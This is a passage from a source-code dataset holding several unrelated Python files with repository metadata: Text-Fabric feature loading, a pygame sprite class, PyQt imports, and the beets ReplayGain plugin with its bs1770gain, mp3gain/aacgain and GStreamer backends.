        mqlDir = expandDir(self, mqlDir)
        # MQL object names must be sanitized.
        mqlNameClean = cleanName(mqlName)
        mql = MQL(mqlDir, mqlNameClean, self.features, self.tm)
        mql.write()
    def importMQL(self, mqlFile, slotType=None, otext=None, meta=None):
        """Convert an MQL export file to TF features and save them."""
        self.tm.indent(level=0, reset=True)
        (good, nodeFeatures, edgeFeatures,
         metaData) = tfFromMql(mqlFile, self.tm, slotType=slotType, otext=otext, meta=meta)
        if good:
            self.save(nodeFeatures=nodeFeatures, edgeFeatures=edgeFeatures, metaData=metaData)
    def _loadFeature(self, fName, optional=False):
        """Load one feature by name; set ``self.good = False`` on failure.

        A missing feature is tolerated (no error) when *optional* is True.
        """
        if not self.good:
            return False
        silent = self.tm.isSilent()
        if fName not in self.features:
            if not optional:
                self.tm.error(f'Feature "{fName}" not available in\n{self.locationRep}')
                self.good = False
        else:
            # if not self.features[fName].load(silent=silent or (fName not in self.featuresRequested)):
            if not self.features[fName].load(silent=silent):
                self.good = False
    def _makeIndex(self):
        """Scan locations/modules for .tf files and build ``self.features``.

        Later locations/modules override earlier ones (overridden paths
        are recorded in ``self.featuresIgnored``).  Also registers the
        warp features and the precomputed-data placeholders.
        """
        self.features = {}
        self.featuresIgnored = {}
        tfFiles = {}
        for loc in self.locations:
            for mod in self.modules:
                dirF = f'{loc}/{mod}'
                if not os.path.exists(dirF):
                    continue
                with os.scandir(dirF) as sd:
                    files = tuple(e.name for e in sd if e.is_file() and e.name.endswith('.tf'))
                for fileF in files:
                    (fName, ext) = os.path.splitext(fileF)
                    tfFiles.setdefault(fName, []).append(f'{dirF}/{fileF}')
        for (fName, featurePaths) in sorted(tfFiles.items()):
            # The last found path wins; the rest are recorded as ignored.
            chosenFPath = featurePaths[-1]
            for featurePath in sorted(set(featurePaths[0:-1])):
                if featurePath != chosenFPath:
                    self.featuresIgnored.setdefault(fName, []).append(featurePath)
            self.features[fName] = Data(chosenFPath, self.tm)
        self._getWriteLoc()
        self.tm.info(
            '{} features found and {} ignored'.format(
                len(tfFiles),
                sum(len(x) for x in self.featuresIgnored.values()),
            ), tm=False
        )
        good = True
        for fName in WARP:
            if fName not in self.features:
                if fName == WARP[2]:
                    # Missing otext is tolerated: fall back to defaults.
                    self.tm.info((f'Warp feature "{WARP[2]}" not found. Working without Text-API\n'))
                    self.features[WARP[2]] = Data(
                        f'{WARP[2]}.tf',
                        self.tm,
                        isConfig=True,
                        metaData=WARP2_DEFAULT,
                    )
                    self.features[WARP[2]].dataLoaded = True
                else:
                    self.tm.info(f'Warp feature "{fName}" not found in\n{self.locationRep}')
                    good = False
            elif fName == WARP[2]:
                self._loadFeature(fName, optional=True)
        if not good:
            return False
        self.warpDir = self.features[WARP[0]].dirName
        # Register the precomputed features declared in PRECOMPUTE.
        self.precomputeList = []
        for (dep2, fName, method, dependencies) in PRECOMPUTE:
            thisGood = True
            if dep2 and WARP[2] not in self.features:
                continue
            if dep2:
                # Extend dependencies with the otext-declared features.
                otextMeta = self.features[WARP[2]].metaData
                sFeatures = f'{KIND[fName]}Features'
                sFeats = tuple(itemize(otextMeta.get(sFeatures, ''), ','))
                dependencies = dependencies + sFeats
            for dep in dependencies:
                if dep not in self.features:
                    self.tm.info(f'Missing dependency for computed data feature "{fName}": "{dep}"')
                    thisGood = False
            if not thisGood:
                good = False
            self.features[fName] = Data(
                f'{self.warpDir}/{fName}.x',
                self.tm,
                method=method,
                dependencies=[self.features.get(dep, None) for dep in dependencies],
            )
            self.precomputeList.append((fName, dep2))
        self.good = good
def _getWriteLoc(self, location=None, module=None):
writeLoc = (
os.path.expanduser(location)
if location is not None else
''
if len(self.locations) == 0 else
self.locations[-1]
)
writeMod = (
module
if module is not None else
''
if len(self.modules) == 0 else
self.modules[-1]
)
self.writeDir = (
f'{writeLoc}{writeMod}' if writeLoc == '' or writeMod == '' else f'{writeLoc}/{writeMod}'
)
def _precompute(self):
    """Load every feature scheduled in ``self.precomputeList``.

    Records overall success in ``self.good``; stops at the first feature
    that fails to load.
    """
    allLoaded = True
    for (featureName, needsOtext) in self.precomputeList:
        # Features flagged with needsOtext are only loaded when the
        # corresponding "<feat>OK" readiness flag is set on self.
        readiness = getattr(self, f'{featureName.strip("_")}OK', False)
        if needsOtext and not readiness:
            continue
        if not self.features[featureName].load():
            allLoaded = False
            break
    self.good = allLoaded
def _makeApi(self):
    """Build the high-level Api object from the loaded feature data.

    Returns the new Api instance (also stored on ``self.api``), or None
    when an earlier loading step failed (``self.good`` is False).
    """
    if not self.good:
        return None
    silent = self.tm.isSilent()
    api = Api(self)

    # WARP[0] and WARP[1] are the two mandatory warp features; they get
    # dedicated feature objects on the node (F) and edge (E) APIs.
    w0info = self.features[WARP[0]]
    w1info = self.features[WARP[1]]
    setattr(api.F, WARP[0], OtypeFeature(api, w0info.metaData, w0info.data))
    setattr(api.E, WARP[1], OslotsFeature(api, w1info.metaData, w1info.data))

    requestedSet = set(self.featuresRequested)
    for fName in self.features:
        fObj = self.features[fName]
        if fObj.dataLoaded and not fObj.isConfig:
            if fObj.method:
                # Computed (precomputed) feature: expose it on api.C only
                # when it is in the precompute list and its prerequisites
                # (the "<feat>OK" flag for otext-dependent entries) hold.
                feat = fName.strip('_')
                ok = getattr(self, f'{feat}OK', False)
                ap = api.C
                if fName in [x[0] for x in self.precomputeList if not x[1] or ok]:
                    setattr(ap, feat, Computed(api, fObj.data))
                else:
                    fObj.unload()
                    if hasattr(ap, feat):
                        delattr(api.C, feat)
            else:
                # Plain node/edge feature.
                if fName in requestedSet | self.textFeatures:
                    if fName in WARP:
                        # Warp features were attached above.
                        continue
                    elif fObj.isEdge:
                        setattr(api.E, fName, EdgeFeature(api, fObj.metaData, fObj.data, fObj.edgeValues))
                    else:
                        setattr(api.F, fName, NodeFeature(api, fObj.metaData, fObj.data))
                else:
                    # Not requested (and not needed for text): detach from
                    # the API and release its data.
                    if (
                        fName in WARP or
                        fName in self.textFeatures
                    ):
                        continue
                    elif fObj.isEdge:
                        if hasattr(api.E, fName):
                            delattr(api.E, fName)
                    else:
                        if hasattr(api.F, fName):
                            delattr(api.F, fName)
                    fObj.unload()

    # Install the derived API facilities on the freshly built Api.
    addSortKey(api)
    addOtype(api)
    addLocality(api)
    addRank(api)
    addText(api)
    addSearch(api, silent)
    self.tm.indent(level=0)
    self.tm.info('All features loaded/computed - for details use loadLog()')
    self.api = api
    return api
def _updateApi(self):
    """Attach newly loaded features to the existing Api without rebuilding it.

    Mirrors the non-computed branch of ``_makeApi``: requested features are
    added to api.F / api.E if not already present; features no longer
    requested are detached and unloaded. Returns None when loading failed.
    """
    if not self.good:
        return None
    api = self.api
    requestedSet = set(self.featuresRequested)
    for fName in self.features:
        fObj = self.features[fName]
        if fObj.dataLoaded and not fObj.isConfig:
            # Only plain (non-computed) features are handled here.
            if not fObj.method:
                if fName in requestedSet | self.textFeatures:
                    if fName in WARP:
                        # Warp features are managed by _makeApi.
                        continue
                    elif fObj.isEdge:
                        if not hasattr(api.E, fName):
                            setattr(api.E, fName, EdgeFeature(api, fObj.metaData, fObj.data, fObj.edgeValues))
                    else:
                        if not hasattr(api.F, fName):
                            setattr(api.F, fName, NodeFeature(api, fObj.metaData, fObj.data))
                else:
                    # Feature no longer requested: detach and release.
                    if (
                        fName in WARP or
                        fName in self.textFeatures
                    ):
                        continue
                    elif fObj.isEdge:
                        if hasattr(api.E, fName):
                            delattr(api.E, fName)
                    else:
                        if hasattr(api.F, fName):
                            delattr(api.F, fName)
                    fObj.unload()
    self.tm.indent(level=0)
    self.tm.info('All additional features loaded - for details use loadLog()')
| 32.522034
| 98
| 0.58547
|
4a0e9fe301533dab87d6a69aca096e0f0f61a66e
| 1,003
|
py
|
Python
|
Live/sprites/__base.py
|
Pawel095/PJ_Pygame_Prezentacja
|
f6ace78c2df504a262eac6b1ae46d458939dd0c0
|
[
"MIT"
] | null | null | null |
Live/sprites/__base.py
|
Pawel095/PJ_Pygame_Prezentacja
|
f6ace78c2df504a262eac6b1ae46d458939dd0c0
|
[
"MIT"
] | null | null | null |
Live/sprites/__base.py
|
Pawel095/PJ_Pygame_Prezentacja
|
f6ace78c2df504a262eac6b1ae46d458939dd0c0
|
[
"MIT"
] | null | null | null |
import pygame
import global_vars as g
class Base:
    """Shared behaviour for moving sprites: linear kinematics, an
    off-screen test, and centred drawing.

    Subclasses are expected to provide ``self.size`` (width, height) and
    ``self.sprite`` before ``is_outside_screen``/``draw`` are called.
    """

    def __init__(self):
        self.speed = 300
        self.position = (100, 100)
        self.velocity = (0, 0)
        self.acceleration = (0, 0)
        self.alive = True

    def __linear_update(self, deltaT):
        # Integrate acceleration into velocity, and both into position.
        pos_x, pos_y = self.position
        vel_x, vel_y = self.velocity
        acc_x, acc_y = self.acceleration
        self.velocity = (vel_x + acc_x * deltaT, vel_y + acc_y * deltaT)
        self.position = (
            pos_x + vel_x * deltaT + acc_x * deltaT ** 2,
            pos_y + vel_y * deltaT + acc_y * deltaT ** 2,
        )

    def is_outside_screen(self):
        """Return True when the sprite lies entirely beyond the screen edges."""
        x, y = self.position
        if x + self.size[0] <= 0 or y + self.size[1] <= 0:
            return True
        return x >= g.SCREEN_SIZE[0] or y >= g.SCREEN_SIZE[1]

    def update(self, deltaT):
        """Advance the sprite's state by ``deltaT`` seconds."""
        self.__linear_update(deltaT)

    def draw(self):
        """Blit the sprite centred on its position onto the display surface."""
        top_left = (
            self.position[0] - self.size[0] / 2,
            self.position[1] - self.size[1] / 2,
        )
        surface = pygame.display.get_surface()
        surface.blit(self.sprite, top_left)
| 28.657143
| 86
| 0.582253
|
4a0ea0107d37e256afa235e24a6b4de37b3498d7
| 1,362
|
py
|
Python
|
dssvue/mplqt.py
|
gyanz/dssvue
|
c2d6e48f2c83319f70116dbda0346ae53adb9297
|
[
"MIT"
] | 9
|
2019-09-21T20:03:59.000Z
|
2022-01-03T16:19:47.000Z
|
dssvue/mplqt.py
|
gyanz/dssvue
|
c2d6e48f2c83319f70116dbda0346ae53adb9297
|
[
"MIT"
] | 1
|
2019-11-01T20:06:21.000Z
|
2019-11-08T15:12:20.000Z
|
dssvue/mplqt.py
|
gyanz/dssvue
|
c2d6e48f2c83319f70116dbda0346ae53adb9297
|
[
"MIT"
] | null | null | null |
from PyQt5 import uic
from PyQt5 import QtGui
from PyQt5.QtGui import (QColor,QIcon,QTextCursor)
from PyQt5 import QtWidgets
from PyQt5.QtWidgets import (QApplication,QMainWindow,QDialog,QCheckBox,QComboBox,
QWidgetAction,QLabel,QFileDialog,
QAbstractItemView,QAction,QActionGroup,
QSizePolicy,QVBoxLayout,QHBoxLayout,
QTableWidget,QTableWidgetItem,QWidget,
QTableView,
QHeaderView,
QDialogButtonBox,QButtonGroup,QRadioButton, QToolBar)
from PyQt5 import QtCore
from PyQt5.QtCore import (QThread,QMutex,QReadWriteLock,QMutexLocker,QSettings,
pyqtSignal,Qt,QSortFilterProxyModel)
'''
import matplotlib as mpl
mpl.use('Qt5Agg')
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavigationToolbar
import matplotlib.pyplot as plt
'''
import pyqtgraph as pg
from pyqtgraph.imageview.ImageView import ImageView
from pyqtgraph.widgets.MatplotlibWidget import MatplotlibWidget
QAPP = None


def mkQApp():
    """Return the process-wide QApplication, creating it if necessary.

    The instance is cached in the module-level ``QAPP`` global.

    Fix: in PyQt5 ``QApplication`` lives in ``QtWidgets`` (imported at
    the top of this file), not in ``QtGui`` — ``QtGui.QApplication``
    raises AttributeError under PyQt5.
    """
    global QAPP
    QAPP = QApplication.instance()
    if QAPP is None:
        QAPP = QApplication([])
    return QAPP
| 34.923077
| 88
| 0.688693
|
4a0ea064f1120ce0bb26d9778eeddd520e752266
| 39,721
|
py
|
Python
|
beetsplug/replaygain.py
|
arcresu/beets
|
3161e2722670884884adcdaddd25591e3bef3dc4
|
[
"MIT"
] | null | null | null |
beetsplug/replaygain.py
|
arcresu/beets
|
3161e2722670884884adcdaddd25591e3bef3dc4
|
[
"MIT"
] | null | null | null |
beetsplug/replaygain.py
|
arcresu/beets
|
3161e2722670884884adcdaddd25591e3bef3dc4
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# This file is part of beets.
# Copyright 2016, Fabrice Laporte, Yevgeny Bezman, and Adrian Sampson.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
from __future__ import division, absolute_import, print_function
import subprocess
import os
import collections
import sys
import warnings
import xml.parsers.expat
from six.moves import zip
from beets import ui
from beets.plugins import BeetsPlugin
from beets.util import (syspath, command_output, bytestring_path,
displayable_path, py3_path)
# Utilities.
class ReplayGainError(Exception):
    """A non-fatal analysis failure, scoped to a single track or album.

    Raised by the backends; processing of other items may continue.
    """
class FatalReplayGainError(Exception):
    """An unrecoverable failure in a ReplayGain backend.

    Unlike ReplayGainError, this aborts processing entirely.
    """
class FatalGstreamerPluginReplayGainError(FatalReplayGainError):
    """Fatal error from the GStreamer backend: the required GStreamer
    plugins could not be loaded.
    """
def call(args):
    """Run an external command via ``command_output``.

    Returns the command's output; known failure modes are translated
    into ReplayGainError.
    """
    try:
        output = command_output(args)
    except subprocess.CalledProcessError as exc:
        message = u"{0} exited with status {1}".format(args[0], exc.returncode)
        raise ReplayGainError(message)
    except UnicodeEncodeError:
        # Python 2's subprocess on Windows can fail to encode Unicode
        # filenames. See:
        # https://github.com/google-code-export/beets/issues/499
        raise ReplayGainError(u"argument encoding failed")
    return output
# Backend base and plumbing classes.
# Result records produced by the backends:
# Gain — one replay-gain measurement: `gain` in dB, `peak` as a linear factor.
Gain = collections.namedtuple("Gain", "gain peak")
# AlbumGain — the album-level Gain plus the list of per-track Gains.
AlbumGain = collections.namedtuple("AlbumGain", "album_gain track_gains")
class Backend(object):
    """Abstract base class for ReplayGain calculation engines."""

    def __init__(self, config, log):
        """Keep a reference to the plugin logger.

        ``config`` is the plugin's configuration view; concrete
        backends read their settings from it.
        """
        self._log = log

    def compute_track_gain(self, items):
        """Compute per-track gain values; concrete backends must override."""
        raise NotImplementedError()

    def compute_album_gain(self, album):
        """Compute album-level gain; concrete backends must override."""
        # TODO: implement album gain in terms of track gain of the
        # individual tracks which can be used for any backend.
        raise NotImplementedError()
# bsg1770gain backend
class Bs1770gainBackend(Backend):
    """bs1770gain is a loudness scanner compliant with ITU-R BS.1770 and
    its flavors EBU R128, ATSC A/85 and Replaygain 2.0.
    """

    def __init__(self, config, log):
        """Read chunking/method settings and locate the ``bs1770gain`` tool.

        Raises FatalReplayGainError when the tool cannot be invoked.
        """
        super(Bs1770gainBackend, self).__init__(config, log)
        config.add({
            'chunk_at': 5000,
            'method': 'replaygain',
        })
        self.chunk_at = config['chunk_at'].as_number()
        self.method = '--' + config['method'].as_str()

        cmd = 'bs1770gain'
        try:
            # Probe invocation; OSError means the tool is not installed
            # or not executable.
            call([cmd, self.method])
            self.command = cmd
        except OSError:
            raise FatalReplayGainError(
                u'Is bs1770gain installed? Is your method in config correct?'
            )
        if not self.command:
            raise FatalReplayGainError(
                u'no replaygain command found: install bs1770gain'
            )

    def compute_track_gain(self, items):
        """Computes the track gain of the given tracks, returns a list
        of TrackGain objects.
        """
        output = self.compute_gain(items, False)
        return output

    def compute_album_gain(self, album):
        """Computes the album gain of the given album, returns an
        AlbumGain object.
        """
        # TODO: What should be done when not all tracks in the album are
        # supported?
        supported_items = album.items()
        output = self.compute_gain(supported_items, True)
        if not output:
            raise ReplayGainError(u'no output from bs1770gain')
        # The album gain is appended last by compute_gain.
        return AlbumGain(output[-1], output[:-1])

    def isplitter(self, items, chunk_at):
        """Break an iterable into chunks of at most size `chunk_at`,
        generating lists for each chunk.
        """
        iterable = iter(items)
        while True:
            result = []
            for i in range(chunk_at):
                try:
                    a = next(iterable)
                except StopIteration:
                    break
                else:
                    result.append(a)
            if result:
                yield result
            else:
                break

    def compute_gain(self, items, is_album):
        """Computes the track or album gain of a list of items, returns
        a list of TrackGain objects.

        When computing album gain, the last TrackGain object returned is
        the album gain
        """
        if len(items) == 0:
            return []

        albumgaintot = 0.0
        albumpeaktot = 0.0
        returnchunks = []

        # In the case of very large sets of music, we break the tracks
        # into smaller chunks and process them one at a time. This
        # avoids running out of memory.
        if len(items) > self.chunk_at:
            i = 0
            for chunk in self.isplitter(items, self.chunk_at):
                i += 1
                returnchunk = self.compute_chunk_gain(chunk, is_album)
                # Each chunk's last entry is that chunk's album gain;
                # aggregate gains by averaging, peaks by taking the max.
                albumgaintot += returnchunk[-1].gain
                albumpeaktot = max(albumpeaktot, returnchunk[-1].peak)
                returnchunks = returnchunks + returnchunk[0:-1]
            returnchunks.append(Gain(albumgaintot / i, albumpeaktot))
            return returnchunks
        else:
            return self.compute_chunk_gain(items, is_album)

    def compute_chunk_gain(self, items, is_album):
        """Compute ReplayGain values and return a list of results
        dictionaries as given by `parse_tool_output`.
        """
        # Construct shell command.
        cmd = [self.command]
        cmd += [self.method]
        cmd += ['--xml', '-p']

        # Workaround for Windows: the underlying tool fails on paths
        # with the \\?\ prefix, so we don't use it here. This
        # prevents the backend from working with long paths.
        args = cmd + [syspath(i.path, prefix=False) for i in items]
        path_list = [i.path for i in items]

        # Invoke the command.
        self._log.debug(
            u'executing {0}', u' '.join(map(displayable_path, args))
        )
        output = call(args)

        self._log.debug(u'analysis finished: {0}', output)
        results = self.parse_tool_output(output, path_list, is_album)
        self._log.debug(u'{0} items, {1} results', len(items), len(results))
        return results

    def parse_tool_output(self, text, path_list, is_album):
        """Given the output from bs1770gain, parse the text and
        return a list of dictionaries
        containing information about each analyzed file.
        """
        per_file_gain = {}
        album_gain = {}  # mutable variable so it can be set from handlers
        parser = xml.parsers.expat.ParserCreate(encoding='utf-8')
        # Expat streams events; accumulate the current track's values here.
        state = {'file': None, 'gain': None, 'peak': None}

        def start_element_handler(name, attrs):
            # <track file="...">, <integrated lu="...">, <sample-peak factor="...">
            if name == u'track':
                state['file'] = bytestring_path(attrs[u'file'])
                if state['file'] in per_file_gain:
                    raise ReplayGainError(
                        u'duplicate filename in bs1770gain output')
            elif name == u'integrated':
                state['gain'] = float(attrs[u'lu'])
            elif name == u'sample-peak':
                state['peak'] = float(attrs[u'factor'])

        def end_element_handler(name):
            # </track> finishes one file; </summary> carries the album values.
            if name == u'track':
                if state['gain'] is None or state['peak'] is None:
                    raise ReplayGainError(u'could not parse gain or peak from '
                                          'the output of bs1770gain')
                per_file_gain[state['file']] = Gain(state['gain'],
                                                    state['peak'])
                state['gain'] = state['peak'] = None
            elif name == u'summary':
                if state['gain'] is None or state['peak'] is None:
                    raise ReplayGainError(u'could not parse gain or peak from '
                                          'the output of bs1770gain')
                album_gain["album"] = Gain(state['gain'], state['peak'])
                state['gain'] = state['peak'] = None

        parser.StartElementHandler = start_element_handler
        parser.EndElementHandler = end_element_handler

        try:
            parser.Parse(text, True)
        except xml.parsers.expat.ExpatError:
            raise ReplayGainError(
                u'The bs1770gain tool produced malformed XML. '
                'Using version >=0.4.10 may solve this problem.'
            )

        if len(per_file_gain) != len(path_list):
            raise ReplayGainError(
                u'the number of results returned by bs1770gain does not match '
                'the number of files passed to it')

        # bs1770gain does not return the analysis results in the order that
        # files are passed on the command line, because it is sorting the files
        # internally. We must recover the order from the filenames themselves.
        try:
            out = [per_file_gain[os.path.basename(p)] for p in path_list]
        except KeyError:
            raise ReplayGainError(
                u'unrecognized filename in bs1770gain output '
                '(bs1770gain can only deal with utf-8 file names)')
        if is_album:
            out.append(album_gain["album"])
        return out
# mpgain/aacgain CLI tool backend.
class CommandBackend(Backend):
    """ReplayGain backend that shells out to the mp3gain/aacgain CLI tools."""

    def __init__(self, config, log):
        """Resolve the external gain tool (explicit path or $PATH lookup)
        and read the noclip/targetlevel settings.

        Raises FatalReplayGainError when no usable tool is found.
        """
        super(CommandBackend, self).__init__(config, log)
        config.add({
            'command': u"",
            'noclip': True,
        })

        self.command = config["command"].as_str()

        if self.command:
            # Explicit executable path.
            if not os.path.isfile(self.command):
                raise FatalReplayGainError(
                    u'replaygain command does not exist: {0}'.format(
                        self.command)
                )
        else:
            # Check whether the program is in $PATH.
            for cmd in ('mp3gain', 'aacgain'):
                try:
                    call([cmd, '-v'])
                    self.command = cmd
                except OSError:
                    pass
        if not self.command:
            raise FatalReplayGainError(
                u'no replaygain command found: install mp3gain or aacgain'
            )

        self.noclip = config['noclip'].get(bool)
        target_level = config['targetlevel'].as_number()
        # The tools' reference level is 89 dB; store the delta.
        self.gain_offset = int(target_level - 89)

    def compute_track_gain(self, items):
        """Computes the track gain of the given tracks, returns a list
        of TrackGain objects.
        """
        supported_items = list(filter(self.format_supported, items))
        output = self.compute_gain(supported_items, False)
        return output

    def compute_album_gain(self, album):
        """Computes the album gain of the given album, returns an
        AlbumGain object.
        """
        # TODO: What should be done when not all tracks in the album are
        # supported?

        supported_items = list(filter(self.format_supported, album.items()))
        if len(supported_items) != len(album.items()):
            self._log.debug(u'tracks are of unsupported format')
            return AlbumGain(None, [])

        output = self.compute_gain(supported_items, True)
        return AlbumGain(output[-1], output[:-1])

    def format_supported(self, item):
        """Checks whether the given item is supported by the selected tool.
        """
        if 'mp3gain' in self.command and item.format != 'MP3':
            return False
        elif 'aacgain' in self.command and item.format not in ('MP3', 'AAC'):
            return False
        return True

    def compute_gain(self, items, is_album):
        """Computes the track or album gain of a list of items, returns
        a list of TrackGain objects.

        When computing album gain, the last TrackGain object returned is
        the album gain.

        The values are obtained by invoking the external tool once and
        parsing its tab-delimited output via `parse_tool_output`.
        (Fix: this paragraph was previously a stray string-literal
        statement in the middle of the function body.)
        """
        if len(items) == 0:
            self._log.debug(u'no supported tracks to analyze')
            return []

        # Construct shell command. The "-o" option makes the output
        # easily parseable (tab-delimited). "-s s" forces gain
        # recalculation even if tags are already present and disables
        # tag-writing; this turns the mp3gain/aacgain tool into a gain
        # calculator rather than a tag manipulator because we take care
        # of changing tags ourselves.
        cmd = [self.command, '-o', '-s', 's']
        if self.noclip:
            # Adjust to avoid clipping.
            cmd = cmd + ['-k']
        else:
            # Disable clipping warning.
            cmd = cmd + ['-c']
        cmd = cmd + ['-d', str(self.gain_offset)]
        cmd = cmd + [syspath(i.path) for i in items]

        self._log.debug(u'analyzing {0} files', len(items))
        self._log.debug(u"executing {0}", " ".join(map(displayable_path, cmd)))
        output = call(cmd)
        self._log.debug(u'analysis finished')
        return self.parse_tool_output(output,
                                      len(items) + (1 if is_album else 0))

    def parse_tool_output(self, text, num_lines):
        """Given the tab-delimited output from an invocation of mp3gain
        or aacgain, parse the text and return a list of dictionaries
        containing information about each analyzed file.
        """
        out = []
        # Skip the header line; read exactly num_lines result rows.
        for line in text.split(b'\n')[1:num_lines + 1]:
            parts = line.split(b'\t')
            if len(parts) != 6 or parts[0] == b'File':
                self._log.debug(u'bad tool output: {0}', text)
                raise ReplayGainError(u'mp3gain failed')
            d = {
                'file': parts[0],
                'mp3gain': int(parts[1]),
                'gain': float(parts[2]),
                # The tool reports peak scaled by 2**15 (16-bit full scale).
                'peak': float(parts[3]) / (1 << 15),
                'maxgain': int(parts[4]),
                'mingain': int(parts[5]),
            }
            out.append(Gain(d['gain'], d['peak']))
        return out
# GStreamer-based backend.
class GStreamerBackend(Backend):
    """ReplayGain backend that drives a GStreamer pipeline containing the
    ``rganalysis`` element.
    """

    def __init__(self, config, log):
        """Import GStreamer and assemble the analysis pipeline.

        Raises FatalGstreamerPluginReplayGainError when any required
        element cannot be created.
        """
        super(GStreamerBackend, self).__init__(config, log)
        self._import_gst()

        # Initialized a GStreamer pipeline of the form filesrc ->
        # decodebin -> audioconvert -> audioresample -> rganalysis ->
        # fakesink The connection between decodebin and audioconvert is
        # handled dynamically after decodebin figures out the type of
        # the input file.
        self._src = self.Gst.ElementFactory.make("filesrc", "src")
        self._decbin = self.Gst.ElementFactory.make("decodebin", "decbin")
        self._conv = self.Gst.ElementFactory.make("audioconvert", "conv")
        self._res = self.Gst.ElementFactory.make("audioresample", "res")
        self._rg = self.Gst.ElementFactory.make("rganalysis", "rg")

        if self._src is None or self._decbin is None or self._conv is None \
           or self._res is None or self._rg is None:
            raise FatalGstreamerPluginReplayGainError(
                u"Failed to load required GStreamer plugins"
            )

        # We check which files need gain ourselves, so all files given
        # to rganalsys should have their gain computed, even if it
        # already exists.
        self._rg.set_property("forced", True)
        self._rg.set_property("reference-level",
                              config["targetlevel"].as_number())
        self._sink = self.Gst.ElementFactory.make("fakesink", "sink")

        self._pipe = self.Gst.Pipeline()
        self._pipe.add(self._src)
        self._pipe.add(self._decbin)
        self._pipe.add(self._conv)
        self._pipe.add(self._res)
        self._pipe.add(self._rg)
        self._pipe.add(self._sink)

        self._src.link(self._decbin)
        self._conv.link(self._res)
        self._res.link(self._rg)
        self._rg.link(self._sink)

        self._bus = self._pipe.get_bus()
        self._bus.add_signal_watch()
        self._bus.connect("message::eos", self._on_eos)
        self._bus.connect("message::error", self._on_error)
        self._bus.connect("message::tag", self._on_tag)
        # Needed for handling the dynamic connection between decodebin
        # and audioconvert
        self._decbin.connect("pad-added", self._on_pad_added)
        self._decbin.connect("pad-removed", self._on_pad_removed)

        self._main_loop = self.GLib.MainLoop()

        self._files = []

    def _import_gst(self):
        """Import the necessary GObject-related modules and assign `Gst`
        and `GObject` fields on this object.
        """
        try:
            import gi
        except ImportError:
            raise FatalReplayGainError(
                u"Failed to load GStreamer: python-gi not found"
            )

        try:
            gi.require_version('Gst', '1.0')
        except ValueError as e:
            raise FatalReplayGainError(
                u"Failed to load GStreamer 1.0: {0}".format(e)
            )

        from gi.repository import GObject, Gst, GLib
        # Calling GObject.threads_init() is not needed for
        # PyGObject 3.10.2+
        with warnings.catch_warnings():
            warnings.simplefilter("ignore")
            GObject.threads_init()
        Gst.init([sys.argv[0]])

        self.GObject = GObject
        self.GLib = GLib
        self.Gst = Gst

    def compute(self, files, album):
        """Run the pipeline over ``files``, collecting tags into
        ``self._file_tags``; blocks in the GLib main loop until done.

        Re-raises any error recorded by the bus handlers.
        """
        self._error = None
        self._files = list(files)

        if len(self._files) == 0:
            return

        self._file_tags = collections.defaultdict(dict)

        if album:
            self._rg.set_property("num-tracks", len(self._files))

        if self._set_first_file():
            self._main_loop.run()
            if self._error is not None:
                raise self._error

    def compute_track_gain(self, items):
        """Compute per-track gain; returns a list of Gain tuples."""
        self.compute(items, False)
        if len(self._file_tags) != len(items):
            raise ReplayGainError(u"Some tracks did not receive tags")

        ret = []
        for item in items:
            ret.append(Gain(self._file_tags[item]["TRACK_GAIN"],
                            self._file_tags[item]["TRACK_PEAK"]))

        return ret

    def compute_album_gain(self, album):
        """Compute album gain; returns an AlbumGain built from the tags
        collected during a single album-mode pipeline run.
        """
        items = list(album.items())
        self.compute(items, True)
        if len(self._file_tags) != len(items):
            raise ReplayGainError(u"Some items in album did not receive tags")

        # Collect track gains.
        track_gains = []
        for item in items:
            try:
                gain = self._file_tags[item]["TRACK_GAIN"]
                peak = self._file_tags[item]["TRACK_PEAK"]
            except KeyError:
                raise ReplayGainError(u"results missing for track")
            track_gains.append(Gain(gain, peak))

        # Get album gain information from the last track.
        last_tags = self._file_tags[items[-1]]
        try:
            gain = last_tags["ALBUM_GAIN"]
            peak = last_tags["ALBUM_PEAK"]
        except KeyError:
            raise ReplayGainError(u"results missing for album")

        return AlbumGain(Gain(gain, peak), track_gains)

    def close(self):
        """Detach the bus signal watch; call when done with the backend."""
        self._bus.remove_signal_watch()

    def _on_eos(self, bus, message):
        # A file finished playing in all elements of the pipeline. The
        # RG tags have already been propagated. If we don't have a next
        # file, we stop processing.
        if not self._set_next_file():
            self._pipe.set_state(self.Gst.State.NULL)
            self._main_loop.quit()

    def _on_error(self, bus, message):
        # Stop the pipeline and record the failure for compute() to re-raise.
        self._pipe.set_state(self.Gst.State.NULL)
        self._main_loop.quit()
        err, debug = message.parse_error()
        f = self._src.get_property("location")
        # A GStreamer error, either an unsupported format or a bug.
        self._error = ReplayGainError(
            u"Error {0!r} - {1!r} on file {2!r}".format(err, debug, f)
        )

    def _on_tag(self, bus, message):
        # Collect RG-related tags emitted by rganalysis for the current file.
        tags = message.parse_tag()

        def handle_tag(taglist, tag, userdata):
            # The rganalysis element provides both the existing tags for
            # files and the new computes tags. In order to ensure we
            # store the computed tags, we overwrite the RG values when
            # they are received a second time.
            if tag == self.Gst.TAG_TRACK_GAIN:
                self._file_tags[self._file]["TRACK_GAIN"] = \
                    taglist.get_double(tag)[1]
            elif tag == self.Gst.TAG_TRACK_PEAK:
                self._file_tags[self._file]["TRACK_PEAK"] = \
                    taglist.get_double(tag)[1]
            elif tag == self.Gst.TAG_ALBUM_GAIN:
                self._file_tags[self._file]["ALBUM_GAIN"] = \
                    taglist.get_double(tag)[1]
            elif tag == self.Gst.TAG_ALBUM_PEAK:
                self._file_tags[self._file]["ALBUM_PEAK"] = \
                    taglist.get_double(tag)[1]
            elif tag == self.Gst.TAG_REFERENCE_LEVEL:
                self._file_tags[self._file]["REFERENCE_LEVEL"] = \
                    taglist.get_double(tag)[1]

        tags.foreach(handle_tag, None)

    def _set_first_file(self):
        # Start playback of the first file; returns False when there is
        # nothing to process.
        if len(self._files) == 0:
            return False

        self._file = self._files.pop(0)
        self._pipe.set_state(self.Gst.State.NULL)
        self._src.set_property("location", py3_path(syspath(self._file.path)))
        self._pipe.set_state(self.Gst.State.PLAYING)
        return True

